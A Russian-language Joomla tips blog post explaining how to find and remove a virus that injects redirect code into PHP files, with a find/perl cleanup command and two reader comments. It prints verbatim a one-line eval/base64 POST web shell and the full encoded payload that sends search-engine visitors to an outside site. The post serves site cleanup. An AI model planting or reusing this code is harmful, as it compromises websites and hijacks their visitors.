AmiSEO Joomla Хитрости Как убрать вирус на сайте joomla
Печать PDF

Как убрать вирус на сайте joomla

+ 7
+ 3

Уже довольно давно мучает нас один вирус. Суть его работы во внедрении во все php файлы кода, перебрасывающего пользователей из поисковиков на некие порно-ресурсы. Если же заходить напрямую вбив адрес в адресуню строку, то все открывается без проблем.

Само же заражение происходит через файл post.php или pst.php или какое то другое название, содержащий одну строку

eval (base64_decode(<!-- $_POST["php"] -->));

Этот файл как правило лежит в папке images.

Как понять, что у вас именно этот вирус? Откройте файл index.php в корне сайта и скорее всего в самом начале вы увидете что-то вроди

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNlbGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

Соответственно избавиться от вируса можно прошерстив все файлы и удалив из них данный код.

Можно поступить двумя методами:

  1. Скачать весь сайт на компьютер и, воспользовавшись утилитами типа Text Replacer и ему подобными, удалить всю эту гадость из файлов. Далее закачать все на место
  2. Если есть доступ к SSH, находясь в корне сайта, запустить команду
    find . -type f -name '*.php' -exec perl -pi -e 's/eval\(base64_decode\(\"DQp.*KfQ0KfQ==\"\)\)\;//g' '{}' \;

    Она найдет все файлы с расширением php и удалит в них искомый вредоносный код

Второй вариант работает очень быстро, но не всем подойдет.

И не забудьте поменять пароль к FTP и админке сайта. Утечка скорее всего происходит через них. Ну и проверить комп на вирусы не помешает тоже.

Ещё одна полезная комбинация команд позволяет искать текст внутри файлов для выявления вируса

find . -type f  -name '*.php' -exec grep -l 'искомая строка' {} \;
 

Комментарии 

 
0 #2 AmiGator 09.08.2013 11:06
нет. нужна поддержка SSH у вашего хостера и софт на домашнем компьютере типа Putty. Лучше вам погуглить это. В двух словах не объяснить
Цитировать
 
 
0 #1 Анна 05.08.2013 15:05
скажите чтобы запустить команду find . -type f -name '*.php' -exec perl -pi -e 's/eval\(base64_de code\(\"DQp.*KfQ0KfQ==\"\)\)\;//g' '{}' \; (через SSH),для этого нужно создать файл и туда добавить команду?
Цитировать